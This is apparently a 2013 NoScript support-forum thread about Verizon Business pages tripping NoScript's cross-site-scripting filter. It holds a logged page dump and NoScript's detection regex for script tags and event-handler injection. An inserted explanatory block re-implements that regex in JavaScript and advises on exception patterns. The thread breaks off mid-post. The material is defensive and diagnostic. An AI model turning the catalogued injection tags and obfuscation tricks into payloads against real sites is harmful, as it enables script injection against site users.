Verizon Business XSS Issues
Hey all, I've searched around for this, but there doesn't seem to be much helpful information. On the business.verizon.com* pages a lot of the stuff like "Change My Plan" launches a new window at www22.verizon.com**, which fails every time due to:
"NoScript filtered a potential cross-site scripting (XSS) attempt from [https://www22.verizon.com]." etc.
An Unsafe Reload only restarts the "retrieving your account information process" before it inevitably fails again.
The Console shows hundreds of errors, naturally, most of which are something like this:
"Timestamp: 2/27/2013 9:02:22 PM
Warning: Unknown property '-moz-border-radius'. Declaration dropped.
Source File: https://www22.verizon.com/FORYOURSMALLB ... /order.css
Line: 396"
I tried the "geeky" regular expressions to whitelist www22.verizon.com but was unable to figure it out. Guess I'm not geeky enough.
If anybody could give me the correct whitelist expression I would appreciate it. Thanks so much!
* https://business.verizon.com/MyBusiness ... _overview#
** https://www22.verizon.com/FORYOURSMALLB ... iceCC.aspx
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Re: Verizon Business XSS Issues
ALbino wrote: The Console shows hundreds of errors, naturally,
To get to the pertinent ones, please click the blue "Info" tab, and look for those pertaining to NoScript, and especially those that start with [XSS].
Please post them here. If the spam filter trips, try enclosing them in Code tags. Thanks.
Also, the long URLs got truncated due to a known bug in phpBB software. Please enclose them in URL tags, or better yet, in Code tags.
(We also appreciate sanitization of links, such as https/business.verizon dot com, to help prevent even the slightest suspicion that anyone is posting merely to spam for a web site, although I'm certain that this is not the case here. General principles for all...)
Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Re: Verizon Business XSS Issues
Where is, where do you go to get to, "Change My Plan"?
Oh. And WTF!
(And more to come, though it will need to go to pastebin...)
Code:
[NoScript InjectionChecker] HTML injection:
<html><head><script language="javascript">vzLogging_appName="gbOrdering";</script>
<script language="javascript" src="/vztracker/pagetrace/pagetracker.js"></script>
<script type="text/javascript" src="//nexus.ensighten.com/verizon/Bootstrap.js"></script>
<title>Registration Bridge</title>
<script type="text/javascript" src="//nexus.ensighten.com/verizon/Bootstrap.js"></script>
<meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1">
<meta name="CODE_LANGUAGE" content="C#">
<meta name="vs_defaultClientScript" content="JavaScript">
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
<!--<script language="javascript" src="../includes/javascript/css.js"></script>-->
<link rel="stylesheet" type="text/css" href="../Common/includes/css/layout_new.css">
<link rel="stylesheet" type="text/css" href="../Common/includes/css/order.css">
<!--[if lte IE 6]>
<link href="../Common/includes/css/layout_ie6.css" rel="stylesheet" type="text/css">
<![endif]-->
<script>
var fadetext=new Array()
//SET MESSAGES
fadetext[0]="Please wait ... retrieving your account information." //plain image syntax
fadetext[1]="Please wait ... retrieving your existing services information."
fadetext[2]="Please wait ... retrieving services available at your address."
fadetext[3]="Please wait ... loading products & services list."
var curMessage = 0;
var interval = 5000;
function rotatemsg()
{
//alert(document.getElementById('alertmsg').innerTEXT);
setTimeout('rotatemsg()', interval);
document.getElementById('alertmsg').innerHTML = fadetext[curMessage];
if (curMessage < fadetext.length-1)
curMessage++;
else
curMessage = 0;
}
function BeginPageLoad(Ctrl1,Ctrl2)
{
var otherApps = "";
var locationHref = '';
var catHref = '';
var LQHref = '';
var FlowRoute = 'N';
//Changes made for Project North
var PostDataToDifferentDataCenter = "";
//End
//Changes made for Project North - if condition added
if ( PostDataToDifferentDataCenter != "Y" )
{
locationHref ="RegistrationBridgeProcess.aspx?txtAppId=" + "" + "&from=" + "" + "&FlowRoute=" + FlowRoute + "&getstarted=" + LQHref + "&fromChangeAppStart=" + "" + "&MABANNER=" + "N" + "&E=" + "NA" + "&Q=" + "NA"; ;
<!--.net shutdown -->
location.href = locationHref + catHref;
// var appname = navigator.appName;
// if(appname != "Netscape")
// {
//
// var tempHTML = document.getElementById(Ctrl1).innerHTML;
// document.getElementById(Ctrl1).innerHTML = document.getElementById(Ctrl2).innerHTML;
// document.getElementById(Ctrl2).innerHTML = tempHTML;
// }
}
//Changes made for Project North - close brace added
}
</script>
</head>
<body class="order" onload="BeginPageLoad('test1','MyDiv');rotatemsg();">
<form name="Form1" method="post" action="RegistrationBridge.aspx" id="Form1" style="text-align:center">
<div>
<input name="__EVENTTARGET" id="__EVENTTARGET" value="" type="hidden">
<input name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" type="hidden">
<input name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTE3NTcwNTc2MGRk" type="hidden">
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['Form1'];
if (!theForm) {
theForm = document.Form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script language="javascript" src="../Common/includes/js/espanol.js"></script>
<script language="javascript" src="../Common/includes/js/GlobalHeader.js"></script>
<script language="javascript" src="../Common/includes/js/oo_engine.js"></script>
<script language="javascript" type="text/javascript">
var issaveorder = 'N';
if ((typeof MP != 'undefined') && (MP != null) && (MP.Domains != null))
{
MP.Domains['es']='espanol.verizon.com';
}
//window.onerror = function(errorMsg, url, lineNumber) {if(typeof Log != 'undefined')Log.Error(errorMsg, url, lineNumber); }
window.onerror = function(errorMsg, url, lineNumber)
{
//debugger;
// alert(dojoAjaxContent + ' - ' + url + ' - ' + lineNumber);
try{
var dojoAjaxContent = new Object()
dojoAjaxContent["error"] = errorMsg;
dojoAjaxContent["url"] = url;
dojoAjaxContent["line"] = lineNumber;
dojo.xhrPost({
url: '/ForYourSmallBiz/GoFlow/Common/JsError.aspx',
content: dojoAjaxContent,
load: function(){},
error: function(err){//alert("ERROR");
},
timeout: 80000
});
// try
// {
// if(location.href.toUpperCase().indexOf('VOICE')>0)
// {
// ShowTab(document.getElementById('lnkLines'), 'dvLines');
// }
// }
// catch(e)
// {}
}
catch(e)
{
//Do Nothing
}
return true;
}
function getSelectedTab() {
document.getElementById("hdnClickYesNo").value="Y";
var tab='';
var sPath = window.location.pathname;
var sPage = sPath.substring(sPath.lastIndexOf('/') + 1);
if(sPage.toUpperCase()=='VOICECONFIG.ASPX')
{
var objControl = document.getElementById('Header1_hdnSelectedVoiceTab'); //$('input[type=hidden][id*=hdnSelectedVoiceTab]');
if(tabActive.id!=null && objControl!=null)
objControl.value = tabActive.id;
}
}
function ValidateNavigationHeader(vzLink) {
document.getElementById("hdnClickYesNo").value="Y";
var pmappid = document.getElementById("curappid");
window.document.forms[0].method = "post";
if (pmappid != null && pmappid.value == "AF") {
window.document.forms[0].action = "../MyVerizonNew/SaveOrder.aspx?ClickNo=Y";
}
else {
window.document.forms[0].action = "../OrderNew/SaveOrder.aspx?ClickNo=Y";
}
window.document.forms[0].submit();
}
function NavigateHeader()
{ if(issaveorder.toLowerCase() == 'false')
VZT.ModalHandler.show({ width: 500, height: 400, skin: 'default', content: '#SaveMyOrderPopup' });
else
ValidateNavigation('http://smallbusiness.verizon.com');
}
function HideOverLay()
{
try
{
VZT.ModalHandler.hide();
}
catch(e)
{
}
}
function CheckforSaveOrder(IsSavecart)
{
var tab='';
var sPath = window.location.pathname;
var sPage = sPath.substring(sPath.lastIndexOf('/') + 1);
if(sPage.toUpperCase()=='VOICECONFIG.ASPX')
{
if(tabActive.id!=null)
tab='?Tab='+tabActive.id;
}
var URL = "SaveOrder.aspx"+tab;
if(window.location.href.indexOf("MyVerizon")>-1)
URL = "../MyVerizonNew/"+URL;
else
URL = "../OrderNew/"+URL;
if(IsSavecart=="Y"){
location.href=URL; }
else{
location.href="http://smallbusiness.verizon.com";
}
}
// Added to check the availability of chat icon (script return from AIMS) - For Business specialist - Sushanth
function AimsChatStatus(obj) {
//debugger;
if (obj == "NA") {
if (document.getElementById("divSpecialistHeader")) {
document.getElementById("divSpecialistHeader").style.display = "block";
}
}
else if (obj == "AA") {
if (document.getElementById("divSpecialistHeader")) {
document.getElementById("divSpecialistHeader").style.display = "none";
}
}
}
// Added to check the availability of chat icon
setTimeout('displayBusinessSpecialist()', 20000);
function displayBusinessSpecialist() {
//debugger;
var varSpanText = "";
if (document.getElementById("aimsChatIcon1")) {
varSpanText = document.getElementById("aimsChatIcon1").innerHTML;
}
else if (document.getElementById("aimsChatIcon")) {
varSpanText = document.getElementById("aimsChatIcon").innerHTML;
}
var varSpanIndex = varSpanText.indexOf("aimsChatIconAvailable");
if (varSpanIndex != -1) {
if (document.getElementById("divSpecialist") != null)
document.getElementById("divSpecialistHeader").style.display = "none";
}
else if (varSpanIndex == -1) {
if (document.getElementById("divSpecialistHeader")) {
if (document.getElementById("divSpecialist") != null)
document.getElementById("divSpecialistHeader").style.display = "block";
}
}
}
//Added OVER - Sushanth
</script>
<div class="vzt" style="padding: 5px;">
<div class="gb">
<a href="#" onclick="CheckforSaveOrder('N')" class="fl logo">
<img src="../Common/images/OrderNew/logo.gif" alt="Verizon"></a>
<input name="Header1$hdnSelectedVoiceTab" id="Header1_hdnSelectedVoiceTab" type="hidden">
<input value="" id="curappid" name="curappid" type="hidden">
<div class="clear">
</div>
</div>
<input id="hdnClickYesNo" name="hdnClickYesNo" value="N" type="hidden">
<input id="hdnSAVECARTSUCCESS" name="hdnSAVECARTSUCCESS" value="N" type="hidden">
</div>
<div class="fixer" style="height:50px;"></div>
<div id="MyDiv" name="MyDiv" class="vzt" align="center">
<div id="test1" class="gb" style="margin-top:30px;">
<div class="ds">
<div style="margin-left:10;margin-right:10">
<div class="middle png">
<div class="bg">
<div class="pad_wide" align="center">
<div class="t_center" id="dvProgressBar">
<h3><div id="alertmsg"></div></h3>
<img class="centered" src="../Common/images/OrderNew/loading.gif" visible="true">
<div class="fixer" style="height:15px;"></div>
</div>
</div>
</div>
</div>
<div class="bottom png">
<div class="png">
<div class="png"></div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="fixer" style="height:150px;"></div>
<script language="javascript">vzLogging_appName="gbOrdering";</script>
<script language="javascript" src="/vztracker/pagetrace/pagetracker.js"></script>
<script language="javascript" src="../Common/includes/js/BrowserClose.js"></script><!-- Changes made for Release TN Chagnes -->
<script language="javascript" src="../Common/includes/js/oo_engine.js"></script><!--included for site feedback link error-->
<!-- BEGIN: OnlineOpinion v4.1 EVENT SURVEy -->
<!-- This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. -->
<script src="../Common/Includes/js/onlineopinionP41s/oo_engine.js" type="text/javascript"></script>
<script src="../Common/Includes/js/onlineopinionP41s/oo_conf_en-US_eventSX3.js" type="text/javascript"></script>
<!-- END : OnlineOpinion v4.0, Copyright 2008-2009 Opinionlab, Inc. -->
<script>
</script>
<!-- mp_trans_disable_start -->
<script language="javascript1.1">
var _hbEC=0,_hbE=new Array;function _hbEvent(a,b){b=_hbE[_hbEC++]=new Object();b._N=a;b._C=0;return b;}
var hbx=_hbEvent("pv");hbx.vpc="HBX....u";hbx.gn="ehg-verizon.hitbox.com";
//BEGIN EDITABLE SECTION
//CONFIGURATION VARIABLES
var varLoc=document.location.hostname;
var varURL = document.location.href;
if ( varLoc.indexOf('www22') == 0 || varLoc.indexOf('espanol')==0 )
{
if(varLoc.indexOf('espanol')==0 && varURL.indexOf("stage") >=0)
{
hbx.acct="DM56....PISS;DM56....C0VN";// TEST ACCTS
}
else
{
hbx.acct="DM550....8DM;DM560....BWM";//PROD ACCTS
}
}
else
{
hbx.acct="DM560....ISS;DM560....0VN";// TEST ACCTS
}
hbx.pn="verifyservices3";//PAGE NAME(S)
hbx.mlc="vz/smallbus/order/am service easy/";//CONTENT CATEGORY
hbx.pndef="";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY
//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.lc="y"; //force lower case page names
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME
hbx.lt="auto";//LINK TRACKING
hbx.dlf="n";//DOWNLOAD FILTER
hbx.dft="n";//DOWNLOAD FILE NAMING
hbx.elf="n";//EXIT LINK FILTER
//SEGMENTS AND FUNNELS
hbx.seg="";//VISITOR SEGMENTATION
hbx.fnl="";//FUNNELS
//CAMPAIGNS
hbx.cmp="";//CAMPAIGN ID
hbx.cmpn="";//CAMPAIGN ID IN QUERY
hbx.dcmp="";//DYNAMIC CAMPAIGN ID
hbx.dcmpn="";//DYNAMIC CAMPAIGN ID IN QUERY
hbx.dcmpe="";//DYNAMIC CAMPAIGN EXPIRATION
hbx.dcmpre="";//DYNAMIC CAMPAIGN RESPONSE EXPIRATION
hbx.hra="";//RESPONSE ATTRIBUTE
hbx.hqsr="";//RESPONSE ATTRIBUTE IN REFERRAL QUERY
hbx.hqsp="";//RESPONSE ATTRIBUTE IN QUERY
hbx.hlt="";//LEAD TRACKING
hbx.hla="";//LEAD ATTRIBUTE
hbx.gp="";//CAMPAIGN GOAL
hbx.gpn="";//CAMPAIGN GOAL IN QUERY
hbx.hcn="";//CONVERSION ATTRIBUTE
hbx.hcv="";//CONVERSION VALUE
hbx.cp="null";//LEGACY CAMPAIGN
hbx.cpd="";//CAMPAIGN DOMAIN
var cv = _hbEvent("cv");
//CUSTOM VARIABLES
hbx.ci="";//CUSTOMER ID
hbx.hc1="";//CUSTOM 1
hbx.hc2="";//CUSTOM 2
hbx.hc3="";//CUSTOM 3
hbx.hc4="";//CUSTOM 4
if (varLoc.indexOf('espanol')==0 )
hbx.hc4="spanish";
else
hbx.hc4="";
hbx.hrf="";//CUSTOM REFERRER
hbx.pec="";//ERROR CODES
//INSERT CUSTOM EVENTS
hbx.lvm="300";
cv.c8 = "";//Session Id
cv.c9 = "";
cv.c10 = "";
cv.c11 = ""; // Included to get the c11 Variable for the NC Scenarios in the Order Address Info Page and OOF Page and LBO.
cv.c12 = ""; // Qualify Attempt Go Flow Session ID . For NC Flow -- OrderAddress Info Page and for AMF Registration Bridge Page and LBO for Common
cv.c14 = ""; // Session ID for Review Order Page
//END EDITABLE SECTION
</script>
<script language="javascript1.1" src="/ForYourSmallBiz/GoFlow/common/includes/js/hbx.js"></script>
<!-- mp_trans_disable_end -->
<!-- For WR 75556 - Site Catalyst -->
<script language="javascript">
var varLoc = document.location.hostname;
var varURL = document.location.href;
var s_account = 'verizontelecomglobal,verizontelecomsmb';
</script>
<script language="javascript" src="https://www22.verizon.com/includes/javascript/omnicode.js"></script>
<script language="javascript">
if(typeof (s_837) != "undefined")
{
s_837.pfxID = "smb"
s_837.pageLanguage="" //override en for language by populating this var with alternate 2 digit language code
if(varLoc.indexOf('espanol') > -1 ) s_837.pageLanguage = "es"
s_837.prop2="small business"
s_837.prop3="order"
s_837.prop6="business"
s_837.simplepageName = "";
s_837.detailpageName = "/FORYOURSMALLBIZ/GoFlow/MyVerizonNew/RegistrationBridge.aspx";
s_837.prop4 = "";
s_837.prop5 = "smb user";
s_837.prop10 = "";
s_837.prop22 = "";
s_837.prop48 = "EORDERING";
s_837.prop74 = "return";
s_837.prop75 = "";
var s_code=s_837.t();
if(s_code)
document.write(s_code);
}
</script>
<!-- For QH 61 -- ClearSaleing Tags -->
<script type="text/javascript">
var csOrderNum = 'jfsi6022YD';
var csOrderType = 'Loop Qual Attempt_General-SB';
var csSalesStageCode = 'Closed/Won';
</script>
<script type="text/javascript">
csCookieDomain = 'verizon.com';
</script>
<script language="javascript" src="https://dsa.csdata1.com/data/js/19000367/csgather.js"></script>
<script language="javascript" type="text/javascript">
</script>
<!--<span id="footer"> -->
<div class="vzt">
<div class="gb">
<div id="footer" class="footer">
<div class="fl">
<ul>
<li><a id="Footer1_Truste" style="float: none" onclick="javascript:window.open('http://www22.verizon.com/privacy/'); return false;" href="javascript:void(0);" name="&lid=footer_trusteeimage">
<img alt="Reviewed by TRUSTe site privacy statement" src="../Common/Images/truste_logo2.gif"></a></li>
<li class="last"><a style="float: none" onclick="javascript:window.open('http://www.bbbonline.org/cks.asp?id=108072593112'); return false;" href="javascript:void(0);" name="&lid=hp_res_footer_bbb_logo" target="_blank">
<img oncontextmenu="alert('Use without permission is prohibited. The BBB Accredited Business seal is a trademark of the Council of Better Business Bureaus, Inc.'); return false;" alt="Click to verify BBB accreditation and to see a BBB report." src="../Common/Images/bbb.jpg"></a></li>
</ul>
</div>
<div class="fr">
<ul>
<li>
<a href="#" onclick="javascript:O_LC();return false;" name="&lid=footer_privacy" target="#">Site Feedback</a>
<span class="divider_new">|</span>
</li>
<li><span class="nolink" style="font-size:12px;"><font color="black"> © 2013 Verizon </font></span></li>
</ul>
</div>
</div>
<!--From -->
<span id="footer1_lblSession" style="display:inline-block;color:White;font-size:10px;width:73px;"></span>
<span id="footer1_lblEpSession" style="display:inline-block;color:White;font-size:10px;width:73px;"></span>
<span id="footer1_lblServerName" style="display:inline-block;color:White;font-size:10px;width:73px;">FE</span>
<span id="footer1_DatacenterValue"></span>
<br>
<!--</span>-->
</div>
</div>
<br>
<div id="CJTag" style="DISPLAY: block">
</div>
<!--FloodLight Tag,Added By Sasanka on 21st May 2010, Please Do not remove -->
<div id="FLTag" style="DISPLAY:none">
</div>
<!-- CT Tag,Added By Sasanka on 21st May 2010, Please do not Remove -->
<div id="CTTag" style="DISPLAY:none">
</div>
<script language="javascript">
function OpenPop(sUrl, title)
{
window.open(sUrl, title, 'toolbar=0,scrollbars=1,dependent=yes,location=0,statusbar=0,menubar=0,width=700,height=500,left=30,top=40,resizable=0');
return;
}
// Changes made for Release TN Changes
if (document.body != null && typeof(BrowserClose) != 'undefined')
{
document.body.onbeforeunload = BrowserClose;
}
var C1Moffer="";
if(C1Moffer!=null && C1Moffer!="Y")
{
if (document.body != null)
{
usrAgnt = navigator.appName;
usrAgnt = usrAgnt.toLowerCase();
if (usrAgnt == 'netscape')
{
window.onbeforeunload = function(event) { try { SaveCartBrowserClose(event); } catch (e) {} }
}
else
{
document.body.onbeforeunload = function() { try { return SaveCartBrowserClose(event); } catch (e) {} };
}
}
}
//End of Changes made for Release TN Changes
custom_var = "";//this variable used in oo_engine.js file
if ((typeof oOobj5 != 'undefined') && (oOobj5 != null) && (oOobj5.Metrics != null) && (oOobj5.Metrics.custom != null))
oOobj5.Metrics.custom.sessionid = "";
</script>
<script type="text/javascript">
var maskArr = document.getElementsByTagName("input");
var isVECFlow = '';
if(document.location.href.indexOf("repcobrowse")>-1)
{
if(typeof(maskArr)!=null)
{
for(i=0;i < maskArr.length; i++)
{
if (maskArr[i].id.indexOf("_SECUREINFO")>0)
{
maskArr[i].value="***";
}
}
}
}
</script>
<script src="../common/includes/js/cb.js"></script>
<script src="../common/includes/js/bootstrapper.js"></script>
<script src="../common/includes/js/parser.js"></script>
<script src="../common/includes/js/sandbox.js"></script>
<script src="../common/includes/js/tabset.js"></script>
<script src="../common/includes/js/overlay.js"></script>
<script src="../common/includes/js/modal.js"></script>
<script src="../common/includes/js/scroller.js"></script>
<script src="../common/includes/js/tooltip.js"></script>
<script language="javascript" src="https://collaborateext.verizon.com/pre/prescripts/FiosOR7001/i2cpre.js"></script>
<script type="text/javascript" lang="javascript">
var aimsZip = "";
var aimsState = "";
var aimsSession = "";
var productdetails ="";
var fios ="";
//WR 70676 - Chat Platform Migration SMB AMIS - Sathish 19/Sep/2011
var actualBundleCode= "";
var aimsFlow ="";
var aimsChatCreditFlow="0";
//Newly added by Sushanth for the AIMS Credit Chat
var newconnect ="";
var winback ="";
var cvcnumber =""; // Credit Refrence No
var onetimefee ="";
var ordertotal ="";
var ordernumber =""; // MON
var actualName =""; // LastName FirstName
var actualEmail ="";
var accountnumber ="";
var productCode="";
if(window.attachEvent != null)
window.attachEvent("onload",SetCustomerInfo);
else if(window.addEventListener != null)
window.addEventListener("load",SetCustomerInfo,true);
function SetCustomerInfo()
{
if(typeof aims_setCustomerInfo != "undefined")
{
aims_setExtraCustomerInfo('ZIP_CODE',aimsZip); // zip code as a String Value.
aims_setExtraCustomerInfo('DOTCOM_SESSIONID',aimsSession);
aims_setCustomerInfo('STATE',aimsState);
//WR 70676 - Chat Platform Migration SMB AMIS - Sathish 19/Sep/2011
//if(aimsFlow!=null && aimsFlow!="")
//aims_setExtraCustomerInfo ('other', aimsFlow + "_SMB");
//else
aims_setExtraCustomerInfo('other',aimsFlow);
aims_setExtraCustomerInfo('BundleCode',actualBundleCode);
aims_setExtraCustomerInfo('aimsChatCreditFlow',aimsChatCreditFlow);
// Newly added by Sushanth for the AIMS Credit Chat
aims_setExtraCustomerInfo('NEW_CONNECT',newconnect); // Flag to indiciate if it is a new connect customer
aims_setExtraCustomerInfo('WINBACK',winback); // flag to indicate if it is a winback customer
aims_setExtraCustomerInfo('CRV_NUMBER',cvcnumber);
aims_setExtraCustomerInfo('ONE_TIME_FEE',onetimefee); //one time fee amount
aims_setExtraCustomerInfo('ORDER_TOTAL',ordertotal); //order total amount
aims_setExtraCustomerInfo('ORDER_NUMBER',ordernumber); //MON if exists or individual order number if available.
aims_setExtraCustomerInfo('ACCOUNT_NUMBER',accountnumber); //if existing customer
aims_setCustomerInfo('NAME',actualName); //customer name
aims_setCustomerInfo('EMAIL',actualEmail); //customer Email
aims_setExtraCustomerInfo('PRODUCT_DETAILS',productdetails);
aims_setExtraCustomerInfo('FIOS',fios);
aims_setExtraCustomerInfo('product code',productCode); // Qualified Products
aims_setExtraCustomerInfo('mon',ordernumber); //MON if exists or individual order number if available.
}
}
</script>
</form>
<span style="display: none;" id="PREhiddenSpan"><form name="PREhtmlSourceForm" id="PREhtmlSourceForm" method="post" action="https://collaborateext.verizon.com/pre/pre/pre.serv" target="PREmyFrame"><input name="PREhtmlSource" id="PREhtmlSource" value="" type="hidden"><input id="PREclientURL" name="PREclientURL" value="" type="hidden"><input name="pagesource" id="pagesource" value="true" type="hidden"><input name="pagerefresh" id="pagerefresh" value="false" type="hidden"></form><iframe name="PREmyFrame" src=
matches <[^\w<>]*(?:[^<>"'\s]*:)?[^\w<>]*(?:\W*s\W*c\W*r\W*i\W*p\W*t|\W*f\W*o\W*r\W*m|\W*s\W*t\W*y\W*l\W*e|\W*s\W*v\W*g|\W*m\W*a\W*r\W*q\W*u\W*e\W*e|(?:\W*l\W*i\W*n\W*k|\W*o\W*b\W*j\W*e\W*c\W*t|\W*e\W*m\W*b\W*e\W*d|\W*a\W*p\W*p\W*l\W*e\W*t|\W*p\W*a\W*r\W*a\W*m|\W*i?\W*f\W*r\W*a\W*m\W*e|\W*b\W*a\W*s\W*e|\W*b\W*o\W*d\W*y|\W*m\W*e\W*t\W*a|\W*i\W*m\W*a?\W*g\W*e?|\W*v\W*i\W*d\W*e\W*o|\W*a\W*u\W*d\W*i\W*o|\W*b\W*i\W*n\W*d\W*i\W*n\W*g\W*s|\W*s\W*e\W*t|\W*a\W*n\W*i\W*m\W*a\W*t\W*e)[^>\w])|(?:<\w[\s\S]*[\s\/]|['"](?:[\s\S]*[\s\/])?)(?:formaction|style|background|src|lowsrc|ping|on(?:e(?:rror(?:update)?|nd)|c(?:o(?:nt(?:extmenu|rolselect)|py)|ut|lick|(?:ellc)?hange)|m(?:o(?:ve(?:end|start)?|use(?:o(?:ut|ver)|up|(?:mo|lea)ve|down|wheel|enter))|essage)|lo(?:ad|secapture)|d(?:r(?:ag(?:en(?:d|ter)|drop|over|leave|start)?|op)|ata(?:setc(?:hanged|omplete)|available)|blclick|eactivate)|s(?:t(?:op|art)|elect(?:start)?|croll|ubmit)|b(?:e(?:for(?:e(?:c(?:ut|opy)|p(?:aste|rint)|u(?:pdate|nload)|activate|editfocus)|deactivate)|gin)|lur|ounce)|p(?:ast|ropertychang)e|key(?:up|down|press)|f(?:o(?:cus(?:in|out)?|rm(?:input|change))|i(?:nish|lterchange))|in(?:put|valid)|a(?:fter(?:print|update)|bort|ctivate)|r(?:e(?:s(?:et|ize)|peat|adystatechange)|ow(?:e(?:xit|nter)|s(?:delete|inserted)))|zoom|help|unload))[\s\x08]*=
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 SeaMonkey/2.17a2
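The pattern quoted after "matches" in the log above is what NoScript's InjectionChecker ran against the cross-site POST, and the hidden PRE form at the end of the dump shows why it fired: the page submits its own HTML source (PREhtmlSource) to collaborateext.verizon.com, and that source is full of `<script` tags. What follows is an added example, not NoScript's code and not code posted in this thread: a condensed re-implementation of the pattern's two alternatives, run over constructed form bodies, plus a check of what an Anti-XSS exception line would have to match. The names `fuzzy`, `flagInjection`, `matchesException`, `EXCEPTIONS`, the two sample bodies and the trimmed tag/attribute lists are all assumptions made for the example; the case-insensitive flag and the rule that exception regexes are tested against the request's destination URL are taken from NoScript's documented options, not from this thread.

```javascript
// Added example (not NoScript's code and not from this thread): a condensed
// re-implementation of the two alternatives in the InjectionChecker pattern
// quoted after "matches" in the log above, run over constructed POST bodies.
// Node.js, no dependencies.

// The quoted pattern spells each tag name as \W*s\W*c\W*r\W*i\W*p\W*t so that
// junk between letters ("<s c r i p t") does not defeat it; reproduce that.
function fuzzy(word) {
  return word.split("").map((ch) => "\\W*" + ch).join("");
}

// Trimmed lists (assumption: the real pattern lists many more tags/attributes).
const BARE_TAGS = ["script", "form", "style", "svg", "marquee"];
const BRACKET_TAGS = ["link", "object", "embed", "iframe", "meta", "img"];
const ATTRS = ["formaction", "style", "background", "src",
               "onload", "onerror", "onclick", "onmouseover"];

// Alternative 1: "<", optional scheme-like prefix, then a dangerous tag name;
// the second tag group must be followed by a non-word, non-">" character.
const TAG_SRC =
  "<[^\\w<>]*(?:[^<>\"'\\s]*:)?[^\\w<>]*(?:" +
  BARE_TAGS.map(fuzzy).join("|") +
  "|(?:" + BRACKET_TAGS.map(fuzzy).join("|") + ")[^>\\w])";

// Alternative 2: inside an open tag, or after a quote, a dangerous attribute
// name followed by "=".
const ATTR_SRC =
  "(?:<\\w[\\s\\S]*[\\s/]|['\"](?:[\\s\\S]*[\\s/])?)(?:" +
  ATTRS.join("|") + ")[\\s\\x08]*=";

// Assumption: applied case-insensitively; the quoted pattern is lower-case only.
const INJECTION_RE = new RegExp(TAG_SRC + "|" + ATTR_SRC, "i");

// Decode an application/x-www-form-urlencoded body and report every field
// whose value trips the pattern, with the start of the matched text.
function flagInjection(formBody) {
  const decode = (s) => decodeURIComponent(s.replace(/\+/g, " "));
  const hits = [];
  for (const pair of formBody.split("&")) {
    if (pair === "") continue;
    const eq = pair.indexOf("=");
    const field = decode(eq < 0 ? pair : pair.slice(0, eq));
    const value = decode(eq < 0 ? "" : pair.slice(eq + 1));
    const m = INJECTION_RE.exec(value);
    if (m) hits.push({ field, match: m[0].slice(0, 40) });
  }
  return hits;
}

// Constructed sample: field names are those of the hidden PRE form in the log;
// the PREhtmlSource value is the first few tags of the captured page, encoded
// the way a browser submits a form.
const SAMPLE_UPLOAD =
  "PREhtmlSource=%3Chtml%3E%3Chead%3E%3Cscript+language%3D%22javascript%22%3E" +
  "vzLogging_appName%3D%22gbOrdering%22%3B%3C%2Fscript%3E" +
  "&PREclientURL=https%3A%2F%2Fwww22.verizon.com%2F&pagesource=true&pagerefresh=false";
// Constructed sample of an ordinary form post, which must not be flagged.
const SAMPLE_BENIGN = "user=example&comment=Hello+world";

// Assumption (from the description in NoScript's options dialog, not from
// this thread): each Anti-XSS exception line is a regular expression tested
// against the destination URL of the request. Anchor it and scope it to the
// one endpoint that needs it; "^https?://([a-z]+\\.)*verizon\\.com/" would
// exempt every Verizon host. The pattern below is a constructed example.
const EXCEPTIONS = ["^https://collaborateext\\.verizon\\.com/pre/"];

function matchesException(destUrl, patterns) {
  return patterns.some((p) => new RegExp(p).test(destUrl));
}

console.log(JSON.stringify({
  upload: flagInjection(SAMPLE_UPLOAD),
  benign: flagInjection(SAMPLE_BENIGN),
  exempted: matchesException(
    "https://collaborateext.verizon.com/pre/pre/pre.serv", EXCEPTIONS),
}, null, 2));
```

Run it with `node`. The upload sample is flagged on the PREhtmlSource field at `<script`, the benign post is not, and an obfuscated `<s c r i p t` or a stray `" onload=` in any field is caught the same way. The point for the exception list is that it has to match the request's destination (the collaborateext.verizon.com form action visible in the dump), not the page the user was looking at on www22.verizon.com, and it should be anchored and specific rather than a blanket verizon.com pattern.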
Re: Verizon Business XSS Issues
Code:
[NoScript XSS] Sanitized suspicious upload to 